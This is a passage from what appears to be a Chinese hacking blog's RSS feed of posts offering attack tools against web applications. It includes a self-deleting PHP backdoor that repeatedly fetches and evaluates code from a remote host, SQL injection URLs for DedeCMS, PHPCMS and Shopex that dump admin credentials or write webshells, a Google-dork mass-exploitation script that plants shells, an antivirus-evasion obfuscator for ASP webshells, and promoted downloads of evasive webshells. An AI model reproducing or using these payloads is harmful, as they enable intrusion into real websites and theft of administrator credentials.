    } else {
        return $keyc.str_replace('=', '', base64_encode($result));
    }

}
function hex2str($hex){
    $str = '';
    $arr = str_split($hex, 2);
    foreach($arr as $bit){
        $str .= chr(hexdec($bit));
    }
    return $str;
    }
?>
伪造没有Connection HTTP标头的请求包

		http://www.mumaasp.com/195.html/feed
		0
		
		
		PHP 无文件后门无限循环执行代码
		http://www.mumaasp.com/192.html
		http://www.mumaasp.com/192.html#comments
		Tue, 08 Oct 2013 03:56:29 +0000
		admin
				
		
		

		http://www.mumaasp.com/?p=192
		nonshell.php
<?php
unlink($_SERVER['SCRIPT_FILENAME']);
ignore_user_abort(true);
set_time_limit(0);

$remote_file = 'http://www.mumaasp.com/eval.txt';
while($code = file_get_contents($remote_file)){
  @eval($code);
  sleep(5);
};
?>
eval.txt 内容
file_put_contents('1.txt','hello world '.time());
使用方式 将 nonshell.php 传到服务器之后访问一次他会自删除。但,依然会在后台执行 eval.txt 中的代码。 停止执行 删除或清空 eval.txt。 缺点 服务器或WEB容器一重启后门就没了。]]>
http://www.mumaasp.com/192.html/feed 0
【火爆】dedecms plus/search.php 注入漏洞利用方式 http://www.mumaasp.com/180.html http://www.mumaasp.com/180.html#comments Sun, 20 Jan 2013 19:10:00 +0000 admin http://www.mumaasp.com/?p=180 我一般是这样测试的: 提交 /plus/search.php?keyword=as&typeArr[1 uNion 1]=a  

看结果如果提示 Safe Alert: Request Error step 2 ! 那么直接用下面的exp

/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a  

QQ截图20130119225931.jpg

看结果如果提示 Safe Alert: Request Error step 1 ! 那么直接用下面的exp

/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a  

QQ截图20130119225757.jpg

如果正常显示证明漏洞不存在了。]]>
http://www.mumaasp.com/180.html/feed 0
利用DEDECMS5.7最新注入漏洞拿站点【原创】 http://www.mumaasp.com/175.html http://www.mumaasp.com/175.html#comments Thu, 22 Nov 2012 04:49:15 +0000 admin http://www.mumaasp.com/?p=175 20111227
然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面
返回内容:
 朋友  修改     (可以注入)
上语句/member/ajax_membergroup.php?action=post&membergroup=@`'` Union select userid from `%23@__admin` where 1 or id=@`'` 查看管理员id
返回结果:
 admin  修改 (得到后台的登录帐号admin)
继续上爆密码的字段:
/member/ajax_membergroup.php?action=post&membergroup=@`'` Union select pwd from `%23@__admin` where 1 or id=@`'`
返回结果:
 4880ad187e377d8616d4
得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5
0ad187e377d8616d
哪去cmd5破解-提示收费
直接把密文 丢google里面的到密码
coolboy
尝试登录: OK
过程比较顺利--没有遇到D盾。
]]>
http://www.mumaasp.com/175.html/feed 0
Mumaasp发布——asp木马免杀工具代码 http://www.mumaasp.com/172.html http://www.mumaasp.com/172.html#comments Tue, 06 Nov 2012 06:31:55 +0000 admin http://www.mumaasp.com/?p=172 asp木马的简单免杀,只支持asp文件中<% %>中内容的简单加密 原理很简单,参考lake2的《ASP后门之终极伪装》,采用移位法加密ASP,因为处理比较麻烦,没有对整个asp文件加密,不过对一般的网马达到免杀效果,相关的工具有黑客伟的作品,只是提供一个思路,希望大家能做出更好的免杀工具 把要加密的asp脚本单独保存为asp文件即可,文件可以包含<% %>前后字串 主要部分代码: unit Unit1; interface uses Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms, Dialogs, StdCtrls, Buttons; type TForm1 = class(TForm) Edit1: TEdit; SpeedButton1: TSpeedButton; OpenDialog1: TOpenDialog; Button1: TButton; Button2: TButton; procedure Button2Click(Sender: TObject); procedure SpeedButton1Click(Sender: TObject); procedure Button1Click(Sender: TObject); procedure FormCreate(Sender: TObject); private { Private declarations } but:integer; KeyName:widestring; Crlf:WideString; //移位法编码 function Shift(FName:string):WideString; function UnEncodeStr:WideString; procedure FileASP; public { Public declarations } end; var Form1: TForm1; implementation {$R *.dfm} procedure TForm1.Button2Click(Sender: TObject); begin close; end; procedure TForm1.SpeedButton1Click(Sender: TObject); begin if OpenDialog1.Execute then edit1.Text :=OpenDialog1.FileName; end; procedure TForm1.Button1Click(Sender: TObject); begin if trim(edit1.Text)='' then begin MessageBox(0,'请选择要加密的文件!','提示',MB_ICONINFORMATION); exit; end; if pos('.asp',edit1.Text)=0 then begin MessageBox(0,'请选择正确的文件格式!','提示',MB_ICONINFORMATION); Exit; end; FileASP; MessageBox(0,'加密完成!','提示',0); end; procedure TForm1.FileASP; VAR f:TEXTfile; st:WideString; begin assignfile(f,ExtractFileDir(Application.Exename)+'\muma.asp'); st:=Shift(trim(Edit1.Text)); rewrite(f);   //建立 writeln(f,st); //输出 closefile(f); //关闭文件 end; function TForm1.Shift(FName: string): WideString; var f:TStringList; i,j,pk:integer; //移位参数应介于正负95之间 cc:WideString; begin result:=''; cc:=''; f:=TStringList.Create; try f.LoadFromFile(FName); for i:=0 to f.Count-1 do begin cc:=cc+f+KeyName; end; finally f.Free; end; cc:=StringReplace(cc,'<%','',[rfReplaceAll]); cc:=StringReplace(cc,'%>','',[rfReplaceAll]); for j:=1 to length(cc) do begin //09:Tab键 if (cc[j]<>KeyName) and (Ord(cc[j])<>9) and (Ord(cc[j])<127) then begin begin pk:=Ord(cc[j])+but; if pk>126 then pk:=pk-95 else if pk<32 then pk:=pk+95; Result:=Result+Chr(pk); end; end else Result:=Result+cc[j]; end; Result:='<%'+Crlf+'xu="'+StringReplace(Result,'"','""',[rfReplaceAll])+ '"'+Crlf+'execute(UnEncode(xu))'+Crlf+UnEncodeStr; end; function TForm1.UnEncodeStr: WideString; var Str:string; begin Str :='function UnEncode(temp)'+Crlf+ '   but='+inttostr(but)+Crlf+ '   for i = 1 to len(temp)'+Crlf+ '     if mid(temp,i,1)<>"'+KeyName+'" then'+Crlf+ '         If Asc(Mid(temp, i, 1)) < 32 Or Asc(Mid(temp, i, 1)) > 126 Then'+Crlf+ '           a = a & Chr(Asc(Mid(temp, i, 1)))'+Crlf+ '         else'+Crlf+ '           pk=asc(mid(temp,i,1))-but'+Crlf+ '           if pk>126 then'+Crlf+ '             pk=pk-95'+Crlf+ '           elseif pk<32 then'+Crlf+ '             pk=pk+95'+Crlf+ '           end if'+Crlf+ '           a=a&chr(pk)'+Crlf+ '         end if'+Crlf+ '     else'+Crlf+ '         a=a&vbcrlf'+Crlf+ '     end if'+Crlf+ '   next'+Crlf+ '   UnEncode=a'+Crlf+ 'end function'+Crlf+ '%>'; Result :=Str; end; procedure TForm1.FormCreate(Sender: TObject); begin //随机取得移位参数 Randomize; but:=trunc(random(95+1+95)-95); //but:=1; KeyName:=Chr(random(128)+127)+Chr(random(127)+128); //KeyName:='琳'; Crlf:=char(13)+char(10); end; end.]]> http://www.mumaasp.com/172.html/feed 0 ACCESS执行SQL语句导出一句话拿webshell http://www.mumaasp.com/166.html http://www.mumaasp.com/166.html#comments Fri, 19 Oct 2012 09:16:56 +0000 admin http://www.mumaasp.com/?p=166
逐一执行以下语句就可以导出一句话了 第一句代码 create table cmd (a varchar(50)) 第二句代码 insert into cmd (a) values ('一句话木马') 第三句代码 select * into [a] in 'e:\web\mumaasp\1.asa;x.xls' 'excel 4.0;' from cmd 第四句代码 drop table cmd
直接菜刀里连接http://www.mumaasp.com/1.asa;x.xls SQL语句意思解释: 第一句 建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50 第二句 在表cmd的a字段插入一句话木马 第三句 把cmd表a的内容导出到路径e:\web\mumaasp\的EXCEL文件 第四句 删除建立的cmd表 以下内容为测试: Access利用后台SQL执行命令功能导出WebShell: 这个更简单: Select 'asp一句话木马' into [vote] in 'e:\web\mumaasp\1.asa;x.xls' 'excel 8.0;' from vote或者 Select 'php一句话木马' into outfile 'F:/wwwroot//eval.php'; 后台有执行SQL语句功能(vote为已知表段)]]>
http://www.mumaasp.com/166.html/feed 0
免杀超越神界Asp大马 超强功能 提供免费下载 http://www.mumaasp.com/154.html http://www.mumaasp.com/154.html#comments Fri, 12 Oct 2012 13:08:55 +0000 admin http://www.mumaasp.com/?p=154 批量清马,以及批量替换的功能。一次性替换百万个页面也不会脚本超时。批量挂马还有防清除功能。 大马分为四类,文件管理,信息收集,提升权限,其他 超越神界免杀Asp木马  默认密码:  下载后请及时修改!   如图:     强大的挂马功能!   下载地址:免杀超越神界Asp大马      ]]> http://www.mumaasp.com/154.html/feed 0 最新免杀草泥马4.0Asp大马,未加密源代码下载 http://www.mumaasp.com/146.html http://www.mumaasp.com/146.html#comments Fri, 12 Oct 2012 09:20:18 +0000 admin http://www.mumaasp.com/?p=146 Asp大马很热门,主流大马提权功能,信息收集功能,以及木马隐藏功能都十分不错。还集成了一些比较使用的功能,比如seo信息查询,同服查询,权重查询,畸形目录建立,还有文件保护功能! 草泥马4.0免杀木马   默认密码为  请下载后自行修改! 如图:   畸形带点目录   功能如图:     下载地址: 草泥马4.0(未加密)去后门版 草泥马4.0(加密)免杀版  ]]> http://www.mumaasp.com/146.html/feed 0 免杀php大马集成各种提权0day,明文版 拒绝加密后门! http://www.mumaasp.com/139.html http://www.mumaasp.com/139.html#comments Thu, 11 Oct 2012 13:34:13 +0000 admin http://www.mumaasp.com/?p=139 PHP木马,集成多种提权0day,密码:   界面如下:   PHP大马功能界面   SU提权功能!   cmd提权,还有注册表等操作,下载地址在下面,明文无加密 自己加密免杀 没后门!       下载地址:超强PHP大马,提权必备!    ]]> http://www.mumaasp.com/139.html/feed 0 Dedecms5.3-5.7通杀批量Getwebshell代码 http://www.mumaasp.com/137.html http://www.mumaasp.com/137.html#comments Wed, 10 Oct 2012 13:30:29 +0000 admin http://www.mumaasp.com/?p=137 <?php print_r(' [-]Exploit Title: DEDEcms Variable coverage [-]Date: 1182011 [-]Getshell Author: cfking#90sec.org [-]Site from google ' ); error_reporting(E_ERROR); set_time_limit(0); $keyword='Powered by dedecms' ;//搜索关键字 $timeout = 30; $stratpage = 5; $lastpage = 10000000; // for ($i=$stratpage ; $i<=$lastpage ; $i++ ){ $array=ReadgoogleList($keyword,$timeout,$i); foreach ($array as $url ){ $url_list=file('c:/url.txt'); if (in_array("$urlrn",$url_list)){ echo "[*] Links repeatn"; }else{ $fp = @fopen('c:/url.txt', 'a'); @fwrite($fp, $url."rn"); @fclose($fp); print_r(" [-] Geting URL: $urlrn"); $exploit=Getshell($url); if (strpos($exploit,"OK")>2){ echo "[*] ".$url."/plus/huenke.phprn"; $name=rname($url); if(strpos($name,"200")>5){ echo "[*] Rename Successn"; echo "[*] Record Successn"; $fp = @fopen('c:/shell.txt', 'a'); @fwrite($fp, $url."/plus/huenke.phprn"); @fclose($fp); } } } } } /**漏洞利用**/ function Getshell($url){//下面$content这里需要自己修改一下 $host=$url; $port="80"; $content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=IP地址&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=数据库用户名&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=数据库密码&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=数据库名称&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";//自己抓包修改 $data = "POST /plus/mytag_js.php?aid=1 HTTP/1.1rn"; $data .= "Host: ".$host."rn"; $data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1rn"; $data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8rn"; $data .= "Accept-Language: zh-cn,zh;q=0.5rn"; //$data .= "Accept-Encoding: gzip,deflatern"; $data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7rn"; $data .= "Connection: keep-alivern"; $data .= "Content-Type: application/x-www-form-urlencodedrn"; $data .= "Content-Length: ".strlen($content)."rnrn"; $data .= $content."rn"; $ock=fsockopen($host,$port); if (!$ock) { echo "[*] No response from $host n"; } fwrite($ock,$data); while (!feof($ock)) { $exp=fgets($ock, 1024); return $exp; } } /**返回该页网址列表**/ function ReadgoogleList($keyword,$timeout,$nowpage) { $tmp = array(); $data = ''; $nowpage = ($nowpage-1)*10; $fp = @fsockopen('www.google.com.hk',80,$errno,$errstr,$timeout); @fputs($fp,"GET /search?q=".urlencode($keyword)."&start=".$nowpage." HTTP/1.1rnHost:www.google.com.hkrnConnection: Closernrn"); while ($fp && !feof($fp)) $data .= fread($fp, 102400); @fclose($fp); preg_match_all("/<cite>(.*?)//",$data,$tmp); $num = count($tmp[1]); $array = array(); for($i = 0;$i < $num;$i++) { $row = explode('/',$tmp[1][$i]); $array[] = str_replace('http://','',$row[0]); } return $array; } /** 修改漏洞文件的名称防止再次被利用**/ function rname($url){//根据说明填写下 $host=$url; $port="80"; $content ='';//自己抓包修改 菜刀的包 $data = "POST /plus/你后门地址 HTTP/1.1rn"; $data .= "X-Forwarded-For: 199.1.88.29rn"; $data .= "Referer: http://$hostrn"; $data .= "Content-Type: application/x-www-form-urlencodedrn"; $data .= "User-Agent: Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0rn"; $data .= "Host: $hostrn"; $data .= "Content-Length: ".strlen($content)."rn"; $data .= "Cache-Control: no-cachernrn"; $data .= $content."rn"; $ock=fsockopen($host,$port); if (!$ock) { echo "[*] No response from $host rn"; } fwrite($ock,$data); while (!feof($ock)) { $exp=fgets($ock, 1024); return $exp; } } ?>]]> http://www.mumaasp.com/137.html/feed 0 经典免杀Asp大马,隐藏伪装系统文件 Ftp防删等各种功能! http://www.mumaasp.com/132.html http://www.mumaasp.com/132.html#comments Sun, 07 Oct 2012 07:25:01 +0000 admin http://www.mumaasp.com/?p=132   Asp大马功能界面   非常经典的Asp旁站助手----所谓的Asp小马   下载地址:发布的免杀Asp大马                           经典旁注木马解密版]]> http://www.mumaasp.com/132.html/feed 0 虚拟主机提权专用Webshell 发布超强免杀版! http://www.mumaasp.com/126.html http://www.mumaasp.com/126.html#comments Sat, 06 Oct 2012 14:37:26 +0000 admin http://www.mumaasp.com/?p=126   功能界面:     集合超强各种虚拟主机提权0day!     下载地址:星外-华众-新网-虚拟主机提权专用Webshell 发布]]> http://www.mumaasp.com/126.html/feed 0 发布解密版超级免杀php大马! http://www.mumaasp.com/114.html http://www.mumaasp.com/114.html#comments Sat, 06 Oct 2012 13:55:51 +0000 admin http://www.mumaasp.com/?p=114   功能非常强大,解密无后门! 超强的代理功能 你懂的   解密版,拒绝加密后门!   下载地址:超级免杀PHP大马解密版  ]]> http://www.mumaasp.com/114.html/feed 0 Phpcms2008漏洞0day和EXP http://www.mumaasp.com/109.html http://www.mumaasp.com/109.html#comments Sat, 06 Oct 2012 10:15:07 +0000 admin http://www.mumaasp.com/?p=109 (.+)<\/span>/", $outcode, $x); if (strlen (trim ($x [1])) == 0) return false; else return true; } $query = "x%2527"; $outcode = request ($hostname, $path, $query); preg_match('/FROM `(.+)yp_job/ie',$outcode,$match); $prefix=$match[1]; //function lengthcolumns () //{ echo "\n--------------------------------------------------------------------------------\n"; echo " PhpCms 2008 (job.php \$genre) Blind SQL Injection Exploit\n"; echo " By My5t3ry (http://hi.baidu.com/netstart)\n"; echo "\n--------------------------------------------------------------------------------\n"; echo "[~]trying to get pre...\n"; if ($match[1]) { echo '[+]Good Job!Wo Got The pre -> '.$match[1]."\n"; } else { die(" Exploit failed..."); } echo "[~]trying to get username length...\n"; $exit=0; $length=0; $i=0; while ($exit==0) { $query = "x' OR length((select username from ".$prefix."member Where userid='{$userid}'))=".$i." OR '1'='2"; $query = str_replace (" ", "%20", $query); $query = str_replace ("'", "%2527", $query); $outcode = request ($hostname, $path, $query); $i++; preg_match ("/(.+)<\/span>/", $outcode, $x); //echo $outcode; if ($i>20) {die(" Exploit failed...");} if (strlen (trim ($x [1])) != 0) { $exit=1; }else{ $exit=0; } } $length=$i-1; echo "[+]length -> ".$length; // return $length; //} echo "\n[~]Trying to Crack..."; echo "\n[+]username -> "; while ($pos "; while ($pos ]]> http://www.mumaasp.com/109.html/feed 0 Shopex前台普通用户getshell最新漏洞 http://www.mumaasp.com/103.html http://www.mumaasp.com/103.html#comments Thu, 04 Oct 2012 08:28:49 +0000 admin http://www.mumaasp.com/?p=103 代码
mumaas.com' union select  CHAR(60, 63, 112, 104, 112, 32, 64, 101, 118, 97, 108, 40, 36, 95, 80, 79, 83, 84, 91, 39, 35, 39, 93, 41, 59, 63, 62) into outfile 'E:/zkeysoft/www/x.php'  #
一句话的密码是# 这个漏洞,对于mysql用户权限有要求的,对于导出的目录也得有可写的要求,服务器环境也有要求。 如果无法getshell的话,也可以尝试注入,破密码进后台也一样 shell图
]]>
http://www.mumaasp.com/103.html/feed 0
草泥马、紫云残雪等等Asp木马后门之——爆出密码 http://www.mumaasp.com/52.html http://www.mumaasp.com/52.html#comments Wed, 03 Oct 2012 13:27:48 +0000 admin http://www.mumaasp.com/?p=52 Asp木马登录界面跟这个类似的都可以尝试以下后门

if session("KKK")<>UserPass then 'Asp木马密码验证无问题 if request.form("pass")<>"" then if request.form("pass")=UserPass then session("KKK")=UserPass response.redirect url else ‘关键在这 j"<br><br><br><b><div align=center><font size='5' color='red'>草泥马!</font"&userpass&"></b> <br><br><br><br><b><div align=center><font size='14' color='lime'></font></b></p></center>"&backurl end if    '随意一个密码错误,然后查看源码你会发现密码跟着出来了。如下图

密码ziyun588 成功进入Asp木马功能界面

]]>
http://www.mumaasp.com/52.html/feed 0
phpcms v9最新版爆库漏洞 爆出管理员帐号密码! http://www.mumaasp.com/45.html http://www.mumaasp.com/45.html#comments Wed, 03 Oct 2012 05:28:31 +0000 admin http://www.mumaasp.com/?p=45 第三步:爆出用户密码(下面红色的字体就是要修改的表前缀) http://www.mumaasp.com/api.php?op=add_favorite&url=v9&title=%2527%2520and%2520%2528select%25201%2520from%2528select%2520count%2528%252a%2529%252Cconcat%2528%2528select%2520%2528select%2520%2528select%2520concat%25280x23%252Ccast%2528concat%2528username%252C0x3a%252Cpassword%252C0x3a%252Cencrypt%2529%2520as%2520char%2529%252C0x23%2529%2520from%2520v9_admin%2520LIMIT%25200%252C1%2529%2529%2520from%2520information_schema.tables%2520limit%25200%252C1%2529%252Cfloor%2528rand%25280%2529%252a2%2529%2529x%2520from%2520information_schema.tables%2520group%2520by%2520x%2529a%2529%2520and%2520%25271%2527%253D%25271   如图: ]]> http://www.mumaasp.com/45.html/feed 0